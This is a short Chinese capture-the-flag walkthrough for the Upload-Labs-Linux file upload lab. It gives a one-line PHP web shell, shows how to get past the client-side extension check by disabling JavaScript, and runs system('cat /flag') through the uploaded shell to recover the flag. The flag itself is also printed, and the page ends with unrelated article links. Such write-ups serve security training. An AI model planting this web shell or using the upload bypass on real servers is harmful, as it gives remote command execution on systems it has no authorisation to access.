Upload-Labs-Linux

靶场教程

1.访问页面,文件上传靶场。

2.编写一句话木马上传。另存为【PHP】文件

复制代码
<?php eval($_POST['upfile']); ?>   需要POST请求访问
修改为
<?php eval($_REQUEST['upfile']); ?>   可以在url直接访问

3.发现报错,不允许上传.php文件。

4.查看源码,禁用JavaScript ,并删除该内容。

注:禁用 JavaScript 可使用插件

5.文件上传成功,访问路径。

6.获取 flag , 修改后的一句话木马,可直接访问以下 url 获取 flag

复制代码
http://e24d2149-d2bd-41e0-8d4a-697f1cfb6a9e.node5.buuoj.cn:81/upload/upfile.php?upfile=system("cat /flag");

flag{17cbbe6d-8422-44a3-a2db-17d3eee8d502} 
相关推荐
环境栈笔记14 分钟前
多账号浏览器选型检查清单:Profile、权限、Session 和任务日志怎么评估
前端·人工智能·后端·自动化
前端炒粉22 分钟前
手写promise
java·前端·javascript
LaughingZhu25 分钟前
智能体经典范式构建:ReAct、Plan-and-Solve 与 Reflection
前端·react.js·前端框架
jsonbro34 分钟前
手把手带你实现发布订阅模式
前端·vue.js·设计模式
一只猫的梦34 分钟前
自动化模块 (Automation Module)
前端·chrome
卓豪终端管理41 分钟前
企业数据防泄漏:现代设备控制如何成为终端安全的关键防线
安全
熊猫钓鱼>_>1 小时前
Electron:当 Web 技术统治桌面
大数据·前端·javascript·人工智能·架构·electron·agent
德福危险1 小时前
从盲打xss到到模板注入:unix靶机渗透之Tempus_fugit4
前端·unix·xss
JavaGuide1 小时前
又一个画图 Skill 开源,再见手动画 draw.io!
前端·后端·github
一只猫的梦2 小时前
AI 适配器架构
前端·chrome